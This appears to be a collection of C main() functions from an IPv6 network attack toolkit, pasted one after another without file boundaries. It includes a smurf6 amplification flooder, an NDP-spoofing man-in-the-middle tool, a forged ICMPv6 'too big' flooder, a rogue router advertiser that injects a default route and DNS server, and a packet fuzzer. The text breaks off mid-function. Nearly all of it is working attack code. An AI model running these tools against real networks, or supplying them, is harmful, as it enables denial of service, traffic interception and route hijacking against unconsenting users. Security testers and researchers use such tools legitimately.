int main(int argc, char *argv[]) { int i; char *glob; if (argc < 2 || strncmp(argv[1], "-h", 2) == 0) help(argv[0]); setvbuf(stdout, NULL, _IONBF, 0); setvbuf(stderr, NULL, _IONBF, 0); while ((i = getopt(argc, argv, "Dsm:R:")) >= 0) { switch (i) { case 'm': maxhop = atoi(optarg); break; case 'D': do_dst = 1; break; case 's': noverb = 1; break; case 'R': if ((ll = index(optarg, '/')) != NULL) *ll = 0; replace = thc_resolve6(optarg); break; default: fprintf(stderr, "Error: invalid option %c\n", i); exit(-1); } } if (argc - optind < 1 || argc - optind > 2) help(argv[0]); interface = argv[optind]; if (argc == optind + 2) script = argv[optind + 1]; memset(d, 0, sizeof(d)); _thc_ipv6_showerrors = 0; // we dont want our own address in the discovered addresses glob = thc_get_own_ipv6(interface, NULL, PREFER_GLOBAL); ll = thc_get_own_ipv6(interface, NULL, PREFER_LINK); memcpy(hostpart, ll + 8, 8); if (memcmp(ll + 8, glob + 8, 8) != 0) { // do we have a global address with a different host part? memcpy(d[0], glob, 16); dcnt = 1; } if (do_dst < 255 && do_dst) fprintf(stderr, "Warning: it does not make sense to use the -m and -D options together!\n"); if (noverb == 0) printf("Started IPv6 passive system detection (Press Control-C to end) ...\n"); return thc_pcap_function(interface, "ip6", (char *) detect, 1, NULL); return 0; // never reached }
int main(int argc, char *argv[]) { unsigned char *pkt = NULL, buf[16], fakemac[7] = "\x00\x00\xde\xad\xbe\xef"; unsigned char *multicast6, *victim6; int pkt_len = 0; char *interface; int rawmode = 0; if (argc < 3 || strncmp(argv[1], "-h", 2) == 0) help(argv[0]); if (strcmp(argv[1], "-r") == 0) { thc_ipv6_rawmode(1); rawmode = 1; argv++; argc--; } interface = argv[1]; if (thc_get_own_ipv6(interface, NULL, PREFER_GLOBAL) == NULL) { fprintf(stderr, "Error: invalid interface %s\n", interface); exit(-1); } victim6 = thc_resolve6(argv[2]); if (argv[3] != NULL) multicast6 = thc_resolve6(argv[3]); else multicast6 = thc_resolve6("ff02::1"); memset(buf, 'A', 16); if ((pkt = thc_create_ipv6_extended(interface, PREFER_GLOBAL, &pkt_len, victim6, multicast6, 0, 0, 0, 0, 0)) == NULL) return -1; if (thc_add_icmp6(pkt, &pkt_len, ICMP6_PINGREQUEST, 0, 0xfacebabe, (unsigned char *) &buf, 16, 0) < 0) return -1; if (thc_generate_pkt(interface, fakemac, NULL, pkt, &pkt_len) < 0) { fprintf(stderr, "Error: Can not generate packet, exiting ...\n"); exit(-1); } printf("Starting smurf6 attack against %s (Press Control-C to end) ...\n", argv[2]); while (1) thc_send_pkt(interface, pkt, &pkt_len); return 0; }
int main(int argc, char *argv[]) { if (argc < 4) { printf("code by Fabricio Nogueira Buzeto and Carlos Botelho De Paula Filho\nCode based on thc-ipv6\n\n"); printf("Syntax: %s interface target1 target2\n\n", argv[0]); printf("NDP spoof between target1 and target2 to perform a man-in-the-middle attack.\n"); exit(-1); } memset((char*)&mArgs, 0, sizeof(mArgs)); mArgs.interface = argv[1]; mArgs.ipAddrVic1 = thc_resolve6(argv[2]); mArgs.macAddrVic1 = thc_get_mac(argv[1], NULL, mArgs.ipAddrVic1); mArgs.ownMac = thc_get_own_mac(argv[1]); mArgs.ownIp = thc_get_own_ipv6(argv[1], mArgs.ipAddrVic1, PREFER_LINK); mArgs.twoVics = 1; mArgs.ipAddrVic2 = thc_resolve6(argv[3]); mArgs.macAddrVic2 = thc_get_mac(argv[1], NULL, mArgs.ipAddrVic2); if (mArgs.ownIp == NULL) { fprintf(stderr, "ERROR: Invalid interface: %s\n", argv[1]); exit(-1); } if (mArgs.macAddrVic1 == NULL) { fprintf(stderr, "ERROR: Invalid target1: %s\n", argv[2]); exit(-1); } if (mArgs.macAddrVic2 == NULL) { fprintf(stderr, "ERROR: Invalid target2: %s\n", argv[3]); exit(-1); } spoofer(mArgs); printf("\nPress Control-C to end MITM spoofing...\n"); while(1) sleep(1); }
int main(int argc, char *argv[]) { char *interface, *ptr, buf2[8]; unsigned char *dst = NULL, *dstmac = NULL, *src = NULL, *srcmac = NULL; int i, offset = 14, type = ICMP6_TOOBIG, alert = 0, randsrc = 0, do_crc = 1, maxsize = 160; unsigned char *pkt = NULL, ip6[8]; int pkt_len = 0, count = 0; thc_ipv6_hdr *hdr; unsigned int filler = IDS_STRING, mychecksum; unsigned char offender[1452] = { 0x60, 0x00, 0x00, 0x00, 0x01, 0xcd, 0x3a, 0x3f, 0xff, 0xff, 0xff, 0xff, 0xff, 0xff, 0xff, 0xff, 0xff, 0xff, 0xff, 0xff, 0xff, 0xff, 0xff, 0xff, 0x20, 0x03, 0x00, 0x04, 0x00, 0x04, 0x00, 0x04, 0x00, 0x04, 0x00, 0x04, 0x00, 0x04, 0x00, 0x04, 0x80, 0x00, 0xed, 0xc5, 0xfa, 0xce, 0xba, 0xbe, 0x41, 0x41, 0x41, 0x41, 0x41, 0x41, 0x41, 0x41, 0x41, 0x41, 0x41, 0x41, 0x41, 0x41, 0x41, 0x41, 0x41, 0x41, 0x41, 0x41, 0x41, 0x41, 0x41, 0x41, 0x41, 0x41, 0x41, 0x41, 0x41, 0x41, 0x41, 0x41, 0x41, 0x41, 0x41, 0x41, 0x41, 0x41, 0x41, 0x41, 0x41, 0x41, 0x41, 0x41, 0x41, 0x41, 0x41, 0x41, 0x41, 0x41, 0x41, 0x41, 0x41, 0x41, 0x41, 0x41, 0x41, 0x41, 0x41, 0x41, 0x41, 0x41, 0x41, 0x41, 0x41, 0x41, 0x41, 0x41, 0x41, 0x41, 0x41, 0x41, 0x41, 0x41, 0x41, 0x41, 0x41, 0x41, 0x41, 0x41, 0x41, 0x41, 0x41, 0x41, 0x41, 0x41, 0x41, 0x41, 0x41, 0x41, 0x41, 0x41, 0x41, 0x41, 0x41, 0x41, 0x41, 0x41, 0x41, 0x41, 0x41, 0x41, 0x41, 0x41, 0x41, 0x41, 0x41, 0x41, 0x41, 0x41, 0x41, 0x41 }; if (argc < 3 || strncmp(argv[1], "-h", 2) == 0) help(argv[0]); srand(time(NULL) + getpid()); setvbuf(stdout, NULL, _IONBF, 0); setvbuf(stderr, NULL, _IONBF, 0); while ((i = getopt(argc, argv, "acpPTUrRs:m")) >= 0) { switch(i) { case 'a': alert = 8; break; case 'c': do_crc = 0; break; case 'm': maxsize = -1; break; case 'p': type = ICMP6_ECHOREQUEST; break; case 'P': type = ICMP6_ECHOREPLY; break; case 'T': type = ICMP6_TTLEXEED; break; case 'U': type = ICMP6_UNREACH; break; case 'r': randsrc = 8; break; case 'R': randsrc = 1; break; case 's': src = thc_resolve6(optarg); break; default: fprintf(stderr, "Error: unknown option -%c\n", i); exit(-1); } } if (argc - optind < 2) help(argv[0]); interface = argv[optind]; if ((ptr = index(argv[optind + 1], '/')) != NULL) *ptr = 0; if ((dst = thc_resolve6(argv[optind + 1])) == NULL) { fprintf(stderr, "Error: Can not resolve %s\n", argv[optind + 1]); exit(-1); } if ((srcmac = thc_get_own_mac(interface)) == NULL) { fprintf(stderr, "Error: invalid interface %s\n", interface); exit(-1); } if (src == NULL) if ((src = thc_get_own_ipv6(interface, dst, PREFER_GLOBAL)) == NULL || (src[0] == 0xfe && src[1] == 0x80)) { fprintf(stderr, "Error: no global IPv6 address configured on interface %s\n", interface); exit(-1); } if ((dstmac = thc_get_mac(interface, src, dst)) == NULL) { fprintf(stderr, "Error: can not find a route to target %s\n", argv[2]); exit(-1); } if (maxsize == -1) maxsize = thc_get_mtu(interface) - 48 - alert; if (maxsize > sizeof(offender)) maxsize = sizeof(offender); for (i = 0; i < ((sizeof(offender) - 48) / 4); i++) memcpy(offender + 48 + i*4, (char*) &filler + _TAKE4, 4); memcpy(offender + 8, dst, 16); if ((pkt = thc_create_ipv6_extended(interface, PREFER_GLOBAL, &pkt_len, src, dst, 255, 0, 0, 0, 0)) == NULL) return -1; if (alert) { memset(buf2, 0, sizeof(buf2)); buf2[0] = 5; buf2[1] = 2; if (thc_add_hdr_hopbyhop(pkt, &pkt_len, buf2, 6) < 0) return -1; } if (thc_add_icmp6(pkt, &pkt_len, type, 0, 1280, offender, maxsize, 0) < 0) return -1; if (thc_generate_pkt(interface, srcmac, dstmac, pkt, &pkt_len) < 0) return -1; hdr = (thc_ipv6_hdr *) pkt; if (do_hdr_size) offset = do_hdr_size; printf("Starting to flood target network with toobig %s (Press Control-C to end, a dot is printed for every 1000 packets):\n", interface); while (1) { for (i = 4; i < 8; i++) ip6[i] = rand() % 256; memcpy(hdr->pkt + offset + 32 + 4, ip6 + 4, 4); memcpy(hdr->pkt + offset + 40 + 8 + 8 + 8 + 4 + alert, ip6 + 4, 4); if (randsrc) { for (i = randsrc; i < 16; i++) hdr->pkt[offset + 8 + i] = rand() % 256; } if (do_crc) { hdr->pkt[offset + 42 + alert] = 0; hdr->pkt[offset + 43 + alert] = 0; mychecksum = checksum_pseudo_header(hdr->pkt + offset + 8, hdr->pkt + offset + 24, NXT_ICMP6, hdr->pkt + offset + 40 + alert, pkt_len - offset - 40 - alert); hdr->pkt[offset + 42 + alert] = mychecksum / 256; hdr->pkt[offset + 43 + alert] = mychecksum % 256; } while (thc_send_pkt(interface, pkt, &pkt_len) < 0) usleep(1); count++; if (count % 1000 == 0) printf("."); } return 0; }
int main(int argc, char *argv[]) { char *routerip, *interface, mac[16] = ""; unsigned char *routerip6, *route6, *mac6 = mac, *ip6; unsigned char buf[512], *ptr, buf2[6], string[] = "ip6 and icmp6 and dst ff02::2"; unsigned char *dst = thc_resolve6("ff02::1"); unsigned char *dstmac = thc_get_multicast_mac(dst); unsigned char *dns; int size, mtu = 1500, i, j, k, cnt; unsigned char *pkt = NULL; int pkt_len = 0; int rawmode = 0; pcap_t *p; if (argc < 3 || strncmp(argv[1], "-h", 2) == 0) help(argv[0]); while ((i = getopt(argc, argv, "FHDr")) >= 0) { switch (i) { case 'r': thc_ipv6_rawmode(1); rawmode = 1; break; case 'F': do_frag++; break; case 'H': do_hop = 1; break; case 'D': do_dst = 1; break; default: fprintf(stderr, "Error: invalid option %c\n", i); exit(-1); } } if (argc - optind < 2) help(argv[0]); if (do_hdr_size) myoff = do_hdr_size; frbuf = buf; frbuf2 = buf2; frbuf2len = sizeof(buf2); memset(mac, 0, sizeof(mac)); interface = argv[optind]; mtu = thc_get_mtu(interface); if (argc - optind >= 5) mtu = atoi(argv[optind + 4]); if (argc - optind >= 7 && (ptr = argv[optind + 5]) != NULL) sscanf(ptr, "%x:%x:%x:%x:%x:%x", (unsigned int *) &mac[0], (unsigned int *) &mac[1], (unsigned int *) &mac[2], (unsigned int *) &mac[3], (unsigned int *) &mac[4], (unsigned int *) &mac[5]); else mac6 = thc_get_own_mac(interface); if (argc - optind >= 4 && argv[optind + 3] != NULL) ip6 = thc_resolve6(argv[optind + 3]); else ip6 = thc_get_own_ipv6(interface, NULL, PREFER_LINK); frip6 = ip6; frint = interface; frmac = mac6; if (argc - optind >= 4 && argv[optind + 2] != NULL) dns = thc_resolve6(argv[optind + 2]); else dns = thc_resolve6("ff02::fb"); routerip = argv[optind + 1]; if (routerip == NULL || (ptr = index(routerip, '/')) == NULL) { printf("Error: Option must be supplied as IP-ADDRESS/PREFIXLENGTH, e.g. ff80::01/16\n"); exit(-1); } *ptr++ = 0; size = atoi(ptr); routerip6 = thc_resolve6(routerip); route6 = thc_resolve6(routerip); if (routerip6 == NULL || size < 1 || size > 128) { fprintf(stderr, "Error: IP-ADDRESS/PREFIXLENGTH argument is invalid: %s\n", argv[optind + 1]); exit(-1); } if (size < 48 || size > 64) fprintf(stderr, "Warning: unusual network prefix size defined, be sure what your are doing: %d\n", size); if (dns == NULL) { fprintf(stderr, "Error: dns argument is invalid: %s\n", argv[optind + 2]); exit(-1); } if (ip6 == NULL) { fprintf(stderr, "Error: link-local-ip6 argument is invalid: %s\n", argv[optind + 3]); exit(-1); } if (mtu < 1 || mtu > 65536) { fprintf(stderr, "Error: mtu argument is invalid: %s\n", argv[optind + 4]); exit(-1); } if (mtu < 1228 || mtu > 1500) fprintf(stderr, "Warning: unusual mtu size defined, be sure what you are doing :%d\n", mtu); if (mac6 == NULL) { fprintf(stderr, "Error: mac address in invalid\n"); exit(-1); } memset(buf, 0, sizeof(buf)); memset(buf2, 0, sizeof(buf2)); memset(buf3, 0, sizeof(buf3)); if ((p = thc_pcap_init(interface, string)) == NULL) { fprintf(stderr, "Error: could not capture on interface %s with string %s\n", interface, string); exit(-1); } i = 128 - size; j = i / 8; k = i % 8; if (k > 0) j++; memset(route6 + 16 - j, 0, j); if (k > 0) route6[17 - j] = (route6[17 - j] >> (8 - k)) << (8 - k); // buf[3] = 250; // 0-3: reachable timer buf[6] = 4; // 4-7: retrans timer // option mtu buf[8] = 5; buf[9] = 1; buf[12] = mtu / 16777216; buf[13] = (mtu % 16777216) / 65536; buf[14] = (mtu % 65536) / 256; buf[15] = mtu % 256; // option prefix buf[16] = 3; buf[17] = 4; buf[18] = size; // prefix length buf[19] = 128 + 64; memset(&buf[20], 17, 4); memset(&buf[24], 4, 4); memcpy(&buf[32], route6, 16); i = 48; // mac address option buf[i++] = 1; buf[i++] = 1; memcpy(buf + i, mac6, 6); i += 6; // default route routing option buf[i++] = 0x18; // routing entry option type buf[i++] = 0x03; // length 3 == 24 bytes buf[i++] = 0x00; // prefix length buf[i++] = 0x08; // priority, highest of course i += 2; // 52-53 unknown buf[i++] = 0x11; // lifetime, word buf[i++] = 0x11; // lifetime, word i += 16; // 56-71 address, all zeros for default // specific route routing option 2000::/3 buf[i++] = 0x18; // routing entry option type buf[i++] = 0x03; // length 3 == 24 bytes buf[i++] = 0x03; // prefix length buf[i++] = 0x08; // priority, highest of course i += 2; // 52-53 unknown buf[i++] = 0x11; // lifetime, word buf[i++] = 0x11; // lifetime, word buf[i++] = 0x20; // 56-71 address: 2000:: i += 15; // specific route routing option 2000::/3 buf[i++] = 0x18; // routing entry option type buf[i++] = 0x03; // length 3 == 24 bytes buf[i++] = 0x07; // prefix length buf[i++] = 0x08; // priority, highest of course i += 2; // 52-53 unknown buf[i++] = 0x11; // lifetime, word buf[i++] = 0x11; // lifetime, word buf[i++] = 0xfc; // 56-71 address: fc:: i += 15; // dns option buf[i++] = 0x19; // dns option type buf[i++] = 0x03; // length i += 2; // 74-75 reserved memset(buf + i, 1, 4); // validity time i += 4; memcpy(buf + i, dns, 16); // dns server i += 16; frbuflen = i; if ((pkt = thc_create_ipv6_extended(interface, PREFER_LINK, &pkt_len, ip6, dst, 255, 0, 0, 0xe0, 0)) == NULL) return -1; if (do_hop) { type = NXT_HBH; if (thc_add_hdr_hopbyhop(pkt, &pkt_len, frbuf2, 6) < 0) return -1; } if (do_frag) { type = NXT_FRAG; for (i = 0; i <= do_frag; i++) if (thc_add_hdr_oneshotfragment(pkt, &pkt_len, cnt++) < 0) return -1; } if (do_dst) { if (type == NXT_ICMP6) type = NXT_DST; if (thc_add_hdr_dst(pkt, &pkt_len, buf3, sizeof(buf3)) < 0) return -1; } if (thc_add_icmp6(pkt, &pkt_len, ICMP6_ROUTERADV, 0, 0xff080800, buf, i, 0) < 0) return -1; if (thc_generate_pkt(interface, mac6, dstmac, pkt, &pkt_len) < 0) return -1; frhdr = (thc_ipv6_hdr *) pkt; // init pcap printf("Starting to advertise router %s (Press Control-C to end) ...\n", argv[optind + 1]); while (1) { if (do_dst) { thc_send_as_fragment6(interface, ip6, dst, type, frhdr->pkt + 40 + myoff, frhdr->pkt_len - 40 - myoff, 1240); } else { thc_send_pkt(interface, pkt, &pkt_len); } while (thc_pcap_check(p, (char *) send_rs_reply, NULL) > 0); sleep(5); } return 0; }
int main(int argc, char *argv[]) { unsigned char *pkt = NULL, *pkt_bak, *mcast6, *someaddr6 = NULL; unsigned char *dst6, *src6 = NULL, *mac = NULL, *routers[2], string[64] = "ip6 and dst "; int test_start = 0, fragment = 0, alert = 0, sroute = 0; int do_type = DO_PING, do_alive = 1, hopbyhop = 0, destination = 0, jumbo = 0; int pkt_len = 0, offset = 0, test_current = 0, i, j, k, do_fuzz = 1, test_ptr = 0; int test_end = TEST_MAX, ping = NEVER, frag_offset = 0, header = 0, no_send = 1; int test_pos = 0, test_cnt = 0, do_it, extend = 0, mtu = 1500, size = 64, wait = 0, off2 = 14; char *interface, fuzzbuf[256], *srcmac, *dns, *route6, *real_dst6 = NULL; unsigned char buf[256], buf2[100], buf3[16]; unsigned short int *sip; pcap_t *p; thc_ipv6_hdr *hdr; if (argc < 3 || strncmp(argv[1], "-h", 2) == 0) help(argv[0]); while ((i = getopt(argc, argv, "s:0123456789Xxt:T:p:FSDHRIJan:")) >= 0) { switch (i) { case 's': do_type = DO_TCP; port = atoi(optarg); break; case '0': do_type = DO_NODEQUERY; break; case '1': do_type = DO_PING; break; case '2': do_type = DO_NEIGHSOL; break; case '3': do_type = DO_NEIGHADV; break; case '4': do_type = DO_RA; break; case '5': do_type = DO_MLD_REP; break; case '6': do_type = DO_MLD_DONE; break; case '7': do_type = DO_MLD_QUERY; wait = 0xff0000; break; case '8': do_type = DO_MLD2_REPORT; break; case '9': do_type = DO_MLD2_QUERY; wait = 0xff0000; break; case 'X': do_type = DO_NONE; break; case 't': test_start = atoi(optarg); break; case 'T': test_end = test_start = atoi(optarg); break; case 'p': ping = atoi(optarg); break; case 'a': do_alive = 0; break; case 'S': sroute = 1; break; case 'n': no_send = atoi(optarg); break; case 'F': fragment = 1; break; case 'R': alert = 1; break; case 'D': destination = 1; break; case 'H': hopbyhop = 1; break; case 'J': jumbo = 1; break; case 'I': header = 1; break; case 'x': extend = 1; break; } } if (argc - optind < 2) { fprintf(stderr, "ERROR: not enough options, interface and target address are required!\n"); exit(-1); } interface = argv[optind]; if ((srcmac = thc_get_own_mac(interface)) == NULL) { fprintf(stderr, "ERROR: %s is not a valid interface which has a MAC, use raw mode?\n", interface); exit(-1); } if (no_send < 1) { fprintf(stderr, "ERROR: -n number must be between one and 2 billion\n"); exit(-1); } if (do_hdr_size) { test_pos -= do_hdr_size; offset -= do_hdr_size; off2 = do_hdr_size; } if (do_type != DO_PING && do_type != DO_TCP && do_type != DO_NONE) { if ((mcast6 = thc_resolve6(argv[optind + 1])) == NULL) { fprintf(stderr, "Error: %s does not resolve to a valid IPv6 address\n", argv[optind + 1]); exit(-1); } if (do_type == DO_NEIGHSOL) { dst6 = thc_resolve6("ff02::0001:ff00:0000"); memcpy(dst6 + 13, mcast6 + 13, 3); } else dst6 = thc_resolve6("ff02::1"); } else { dst6 = thc_resolve6(argv[optind + 1]); } if (argv[optind + 1] != NULL) if ((real_dst6 = thc_resolve6(argv[optind + 1])) == NULL) { fprintf(stderr, "Error: %s does not resolve to a valid IPv6 address\n", argv[optind + 1]); exit(-1); } if (interface == NULL || argv[optind + 1] == NULL) { printf("Error: interface and target-ipv6-address are mandatory command line options\n"); exit(-1); } if (ping < 1 || test_end < test_start) { printf("don't f**k up the command line options!\n"); exit(-1); } if (argv[optind + 2] != NULL) someaddr6 = thc_resolve6(argv[optind + 2]); if (argc - optind > 3) { printf("Error: too many command line options\n"); exit(-1); } if ((mac = thc_get_mac(interface, src6, dst6)) == NULL) { fprintf(stderr, "ERROR: Can not resolve mac address for %s\n", argv[2]); exit(-1); } if (do_type == DO_PING || do_type == DO_TCP || do_type == DO_NONE) src6 = thc_get_own_ipv6(interface, dst6, PREFER_GLOBAL); else src6 = thc_get_own_ipv6(interface, dst6, PREFER_LINK); if (src6 == NULL) { fprintf(stderr, "Error: no IPv6 address configured on interface %s\n", interface); exit(-1); } strcat(string, thc_ipv62notation(src6)); if (sroute) { if (someaddr6 != NULL) routers[0] = someaddr6; else routers[0] = dst6; routers[1] = NULL; } setvbuf(stdout, NULL, _IONBF, 0); memset(buf, 0, sizeof(buf)); memset(buf2, 0, sizeof(buf2)); dns = thc_resolve6("ff02::fb"); route6 = thc_resolve6("2a01::"); if ((p = thc_pcap_init(interface, string)) == NULL) { fprintf(stderr, "Error: could not capture on interface %s with string %s\n", interface, string); exit(-1); } if (real_dst6 != NULL && real_dst6[0] == 0xff) do_alive = 0; // ping before to check if it works if (do_alive) if (check_alive(p, interface, srcmac, mac, src6, real_dst6) == 0) { // fprintf(stderr, "Error: target %s is not alive via direct ping6!\n", argv[optind + 1]); // exit(-1); } // generate basic packet strcpy(fuzzbuf, fuzztype_ether); if ((pkt = thc_create_ipv6_extended(interface, PREFER_GLOBAL, &pkt_len, src6, dst6, 0, 0, 0, 0, 0)) == NULL) return -1; if (header) strcat(fuzzbuf, fuzztype_ip6); else strcat(fuzzbuf, fuzztype_ip6no); if (alert || hopbyhop || jumbo) { memset(buf2, 0, sizeof(buf2)); i = 0; if (alert) { buf2[i++] = 5; buf2[i++] = 2; i += 2; strcat(fuzzbuf, ".F.F"); } if (jumbo) { buf2[i++] = 0xc2; buf2[i++] = 4; buf2[i++] = 'J'; // lookup code buf2[i++] = 'J'; buf2[i++] = 'J'; buf2[i++] = 'J'; strcat(fuzzbuf, ".FBBBB"); } if (hopbyhop) { memset(buf3, 0, sizeof(buf3)); buf3[0] = 'X'; buf3[1] = '.'; for (j = 0; j < 10; j++) { buf2[i++] = 1; // PadN, length buf2[i++] = j; if (j > 0) { memset(buf2 + i, 0xaa, j); buf3[2 + j] = '.'; i += j; } strcat(fuzzbuf, buf3); // always: X... for every new option } } if (thc_add_hdr_hopbyhop(pkt, &pkt_len, buf2, i) < 0) return -1; i += 2; if (i % 8 > 0) i = ((i / 8) + 1) * 8; offset += i; } if (sroute) { if (thc_add_hdr_route(pkt, &pkt_len, routers, 1) < 0) return -1; else { strcat(fuzzbuf, "FFFFBBBB................"); offset += 24; } } if (fragment) { frag_offset = offset; if (thc_add_hdr_fragment(pkt, &pkt_len, 0, 0, 0) < 0) return -1; else { strcat(fuzzbuf, "FFWW.."); offset += 8; } } if (destination) { memset(buf2, 0, sizeof(buf2)); memset(buf3, 0, sizeof(buf3)); buf3[0] = 'X'; buf3[1] = '.'; i = 0; for (j = 0; j < 10; j++) { buf2[i++] = 1; // PadN, length buf2[i++] = j; if (j > 0) { memset(buf2 + i, 0xaa, j); buf3[2 + j] = '.'; i += j; } strcat(fuzzbuf, buf3); // always: X... for every new option } if (thc_add_hdr_dst(pkt, &pkt_len, buf2, i) < 0) return -1; i += 2; if (i % 8 > 0) i = ((i / 8) + 1) * 8; offset += i; } memset(buf, 0, sizeof(buf)); // if (header) strcat(fuzzbuf, fuzztype_icmp6); // else // strcat(fuzzbuf, fuzztype_icmp6no); switch (do_type) { case DO_TCP: // tcp options buf[0] = 2; // max segment size buf[1] = 4; buf[2] = 255; buf[3] = 255; buf[4] = 3; // windows size buf[5] = 3; buf[6] = 62; buf[7] = 1; // padding buf[8] = 8; // timestamp buf[9] = 10; buf[10] = time(NULL) / 16777216; buf[11] = ((time(NULL) / 65536) % 256); buf[12] = ((time(NULL) / 256) % 256); buf[13] = time(NULL) % 256; // 4 bytes ack tstamp 00000000 // rest is padding (2 bytes) if (thc_add_tcp(pkt, &pkt_len, 65532, port, test_current, 0, TCP_SYN, 5760, 0, (unsigned char *) buf, 20, (unsigned char *) buf, 20) < 0) return -1; strcat(fuzzbuf, fuzztype_tcp); break; case DO_PING: if (thc_add_icmp6(pkt, &pkt_len, ICMP6_PINGREQUEST, 0, test_current, (unsigned char *) &buf, 16, 0) < 0) return -1; strcat(fuzzbuf, fuzztype_icmp6ping); break; case DO_NONE: // empty break; case DO_NEIGHSOL: if (someaddr6 != NULL) memcpy(buf, someaddr6, 16); else memcpy(buf, mcast6, 16); buf[16] = 1; buf[17] = 1; memcpy(buf + 18, srcmac, 6); if (thc_add_icmp6(pkt, &pkt_len, ICMP6_NEIGHBORSOL, 0, 0, (unsigned char *) &buf, 24, 0) < 0) return -1; strcat(fuzzbuf, fuzztype_icmp6ns); break; case DO_NEIGHADV: if (someaddr6 != NULL) memcpy(buf, someaddr6, 16); else memcpy(buf, src6, 16); buf[16] = 2; buf[17] = 1; memcpy(buf + 18, srcmac, 6); if (thc_add_icmp6(pkt, &pkt_len, ICMP6_NEIGHBORADV, 0, 0xe0000000, (unsigned char *) &buf, 24, 0) < 0) return -1; strcat(fuzzbuf, fuzztype_icmp6na); break; case DO_NODEQUERY: memcpy(buf + 8, real_dst6, 16); if (thc_add_icmp6(pkt, &pkt_len, ICMP6_NODEQUERY, 0, 0x0003003e, (unsigned char *) &buf, 24, 0) < 0) return -1; strcat(fuzzbuf, fuzztype_icmp6nq); break; case DO_RA: // buf[3] = 250; // 0-3: reachable timer buf[6] = 4; // 4-7: retrans timer // option mtu buf[8] = 5; buf[9] = 1; buf[12] = mtu / 16777216; buf[14] = (mtu % 65536) / 256; buf[15] = mtu % 256; // option prefix buf[16] = 3; buf[17] = 4; buf[18] = size; // prefix length buf[19] = 128 + 64; memset(&buf[20], 17, 4); memset(&buf[24], 4, 4); if (someaddr6 != NULL) memcpy(&buf[32], someaddr6, 16); else memcpy(&buf[32], route6, 16); i = 48; // mac address option buf[i++] = 1; buf[i++] = 1; memcpy(buf + i, srcmac, 6); i += 6; // = 8 == 56 // default route routing option buf[i++] = 0x18; // routing entry option type buf[i++] = 0x03; // length 3 == 24 bytes buf[i++] = 64; // prefix length /64 buf[i++] = 0x08; // priority, highest of course i += 2; // 52-53 unknown buf[i++] = 0x11; // lifetime, word buf[i++] = 0x11; // lifetime, word buf[i++] = 0x20; buf[i++] = 4; // 56-71 address, 2004:: for default i += 14; // = 24 == 70 // dns option buf[i++] = 0x19; // dns option type buf[i++] = 0x03; // length i += 2; // 74-75 reserved memset(buf + i, 1, 4); // validity time i += 4; if (someaddr6 != NULL) memcpy(buf + i, someaddr6, 16); // dns server else memcpy(buf + i, dns, 16); // dns server i += 16; // = 24 == 94 // seachlist option buf[i++] = 31; buf[i++] = 4; i += 2; memset(buf + i, 1, 4); // validity time i += 4; buf[i++] = 3; memcpy(buf + i, "foo", 3); i += 3; buf[i++] = 4; memcpy(buf + i, "corp", 4); i += 5; // + null byte buf[i++] = 5; memcpy(buf + i, "local", 5); i += 5; buf[i++] = 6; memcpy(buf + i, "domain", 6); i += 7; // + null byte // = 32 == 126 // flag extension option buf[i++] = 26; buf[i++] = 1; buf[i++] = 0x08; i += 5; if (thc_add_icmp6(pkt, &pkt_len, ICMP6_ROUTERADV, 0, 0xff080800, buf, i, 0) < 0) return -1; strcat(fuzzbuf, fuzztype_icmp6ra); break; case DO_MLD_QUERY: case DO_MLD_DONE: case DO_MLD_REP: buf[0] = 0xff; buf[1] = 0x02; buf[15] = 0x05; if (someaddr6 != NULL) memcpy(buf, someaddr6, 16); if (thc_add_icmp6(pkt, &pkt_len, do_type, 0, wait, buf, 16, 0) < 0) return -1; strcat(fuzzbuf, fuzztype_icmp6mld); break; case DO_MLD2_QUERY: buf[0] = 0xff; buf[1] = 0x02; buf[15] = 0x05; if (someaddr6 != NULL) memcpy(buf, someaddr6, 16); buf[16] = 7; buf[17] = 120; buf[19] = 3; memcpy(buf + 20, dst6, 16); memcpy(buf + 36, buf, 16); if (thc_add_icmp6(pkt, &pkt_len, DO_MLD_QUERY, 0, wait, buf, 68, 0) < 0) return -1; strcat(fuzzbuf, fuzztype_icmp6mld2que); break; case DO_MLD2_REPORT: for (i = 0; i < 3; i++) { buf[0 + 68 * i] = 1 + i * 2 - i / 2; //include new++, generates 1, 3 and 4 buf[3 + 68 * i] = 3; //3 sources buf[4 + 68 * i] = 0xff; buf[5 + 68 * i] = 0x02; buf[18 + 68 * i] = 0x82 + i % 256; buf[19 + 68 * i] = 0xff; memcpy(buf + 20 + 68 * i, src6, 16); buf[36 + 68 * i] = 0xfe; buf[37 + 68 * i] = 0x80; buf[46 + 68 * i] = 0xf0; if (someaddr6 != NULL) memcpy(buf + 52 + 68 * i, someaddr6, 16); } if (thc_add_icmp6(pkt, &pkt_len, do_type, 0, 3, buf, 208, 0) < 0) return -1; strcat(fuzzbuf, fuzztype_icmp6mld2rep); break; default: fprintf(stderr, "ERROR: Mode not implemented yet!\n"); exit(-1); } if (thc_generate_pkt(interface, srcmac, mac, pkt, &pkt_len) < 0) return -1; hdr = (thc_ipv6_hdr *) pkt; if (jumbo) { i = 0; j = 1; while (i < hdr->pkt_len + 4 && j) { if (hdr->pkt[i] == 'J') if (memcmp(&hdr->pkt[i], "JJJJ", 4) == 0) j = 0; i++; } if (j) { fprintf(stderr, "ERROR: fuckup, cant find my own marker?!\n"); exit(-1); } else i--; hdr->pkt[i] = 0; hdr->pkt[i + 1] = 0; hdr->pkt[i + 2] = hdr->pkt[4 + off2]; hdr->pkt[i + 3] = hdr->pkt[5 + off2]; hdr->pkt[4 + off2] = 0; hdr->pkt[5 + off2] = 0; } if (extend) for (i = 0; i < strlen(fuzzbuf); i++) if (fuzzbuf[i] == 'B' || fuzzbuf[i] == 'F') fuzzbuf[i] = 'X'; // backup of generated packet pkt_bak = malloc(hdr->pkt_len); memcpy(pkt_bak, hdr->pkt, hdr->pkt_len); printf("Fuzzing packet, starting at fuzz case %d, ending at fuzz case %d, every packet sent denoted by a dot:\n", test_start, test_end); //printf("buf(%d): %s\n", strlen(fuzzbuf), fuzzbuf); while (do_fuzz) { if (test_cnt == 0) while (fuzzbuf[test_ptr] == '.') { test_ptr++; test_pos++; } if (fuzzbuf[test_ptr] == 0) do_fuzz = 0; test_cnt++; do_it = 1; //printf("[%s] pos[%d]=%c -> %d | pkt[%d] | %d (%d=>%d)| ", /*fuzzbuf*/"", test_ptr, fuzzbuf[test_ptr], test_cnt, test_pos, test_current, test_start, test_end); switch (fuzzbuf[test_ptr]) { case 0: break; case 'X': if (test_cnt <= COUNT_EXTEND) { if (pkt_bak[test_pos] != extends[test_cnt - 1]) hdr->pkt[test_pos] = extends[test_cnt - 1]; else do_it = 0; } else { 